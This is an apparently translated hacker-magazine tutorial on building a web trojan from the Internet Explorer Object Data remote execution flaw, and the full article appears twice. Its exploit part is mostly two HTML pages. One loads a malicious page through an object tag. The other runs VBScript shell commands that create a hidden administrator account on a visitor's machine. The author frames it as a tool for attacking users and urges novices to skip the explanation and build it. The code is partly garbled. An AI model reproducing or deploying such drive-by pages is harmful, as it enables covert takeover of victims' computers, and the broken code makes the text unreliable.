The original Hacker x file No. 8, copyright belongs to the magazine.
Making a new web * using Internet Explorer Object Data vulnerability
lcx
On August 20 this year, Microsoft announced an important vulnerability with the highest severity level - the Internet Explorer Object data remote execution vulnerability. This is a good thing for web * enthusiasts. We can use this loophole to create a brand new * that will not be investigated for the time being. Before introducing how to make this new web *, I will briefly introduce the vulnerability to you.
1. Vulnerability description
The vulnerability was discovered by eEye Digital Security and released on August 20. Microsoft also issued a corresponding announcement on the same day. In the eEye website publishing page: /html/Research/Advisories/, this document mentioned that Microsoft Internet Explorer is a popular WEB browsing program. Internet Explorer does not correctly process the file parameters to be loaded when processing object "Object" tags.
The "Object" tag is used to insert objects such as ActiveX components into HTML pages. The "Type" attribute of the "Object" tag is used to set or get the MIME type of the object. Usually legal MIME types include "plain/text" or "application/hta", "audio/x-mpeg", etc. Internet Explorer specifies the data location of remote objects without sufficiently checking the loaded file attributes. Attackers can build malicious pages and induce users to access to run programs specified by malicious pages. Windows 2003 Internet Explorer uses "Enhanced Security Configuration Mode" mode and uses "Disable ActiveX" by default. Therefore, this vulnerability is medium at the Windows 2003 IE level.
This description is very professional, but novices who don’t understand can skip it and learn how to make it directly. :-)
2. Affected system version
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0SP1
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000
3. Detailed methods for exploiting vulnerabilities
According to the prompts for this page /html/Research/Advisories/, I wrote two simple test pages. Please read the code and comments first, and I will explain it later.
--------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
This is a test page. If your system is w2k or xp, you will add a user whose username is lcx password is lcxlcx after accessing it.
<object data="http://127.0.0.1/"></object>
<!--This is to call a malicious page. I tested it locally and placed it in the root directory of my iis manager, so the url is http://127.0.0.1; if you want to use this code, please change the URL address of the corresponding network and change http://127.0.0.1/ to http://your url/--!>
</body>
--------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<html>
<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
<script language=vbscript>
set wshshell=createobject ("" )
a= (" /c net user lcx lcxlcx /add",0)
b= (" /c net localgroup Administrators lcx /add",0)
'This is to add a user who is an lcx password and lcxlcx management user. You should understand this vbs
</script>
</html>
--------------------------------------------------------------------------------------------------------------------------------
Making a new web * using Internet Explorer Object Data vulnerability
lcx
On August 20 this year, Microsoft announced an important vulnerability with the highest severity level - the Internet Explorer Object data remote execution vulnerability. This is a good thing for web * enthusiasts. We can use this loophole to create a brand new * that will not be investigated for the time being. Before introducing how to make this new web *, I will briefly introduce the vulnerability to you.
1. Vulnerability description
The vulnerability was discovered by eEye Digital Security and released on August 20. Microsoft also issued a corresponding announcement on the same day. In the eEye website publishing page: /html/Research/Advisories/, this document mentioned that Microsoft Internet Explorer is a popular WEB browsing program. Internet Explorer does not correctly process the file parameters to be loaded when processing object "Object" tags.
The "Object" tag is used to insert objects such as ActiveX components into HTML pages. The "Type" attribute of the "Object" tag is used to set or get the MIME type of the object. Usually legal MIME types include "plain/text" or "application/hta", "audio/x-mpeg", etc. Internet Explorer specifies the data location of remote objects without sufficiently checking the loaded file attributes. Attackers can build malicious pages and induce users to access to run programs specified by malicious pages. Windows 2003 Internet Explorer uses "Enhanced Security Configuration Mode" mode and uses "Disable ActiveX" by default. Therefore, this vulnerability is medium at the Windows 2003 IE level.
This description is very professional, but novices who don’t understand can skip it and learn how to make it directly. :-)
2. Affected system version
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0SP1
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000
3. Detailed methods for exploiting vulnerabilities
According to the prompts for this page /html/Research/Advisories/, I wrote two simple test pages. Please read the code and comments first, and I will explain it later.
--------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
This is a test page. If your system is w2k or xp, you will add a user whose username is lcx password is lcxlcx after accessing it.
<object data="http://127.0.0.1/"></object>
<!--This is to call a malicious page. I tested it locally and placed it in the root directory of my iis manager, so the url is http://127.0.0.1; if you want to use this code, please change the URL address of the corresponding network and change http://127.0.0.1/ to http://your url/--!>
</body>
--------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<html>
<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
<script language=vbscript>
set wshshell=createobject ("" )
a= (" /c net user lcx lcxlcx /add",0)
b= (" /c net localgroup Administrators lcx /add",0)
'This is to add a user who is an lcx password and lcxlcx management user. You should understand this vbs
</script>
</html>
--------------------------------------------------------------------------------------------------------------------------------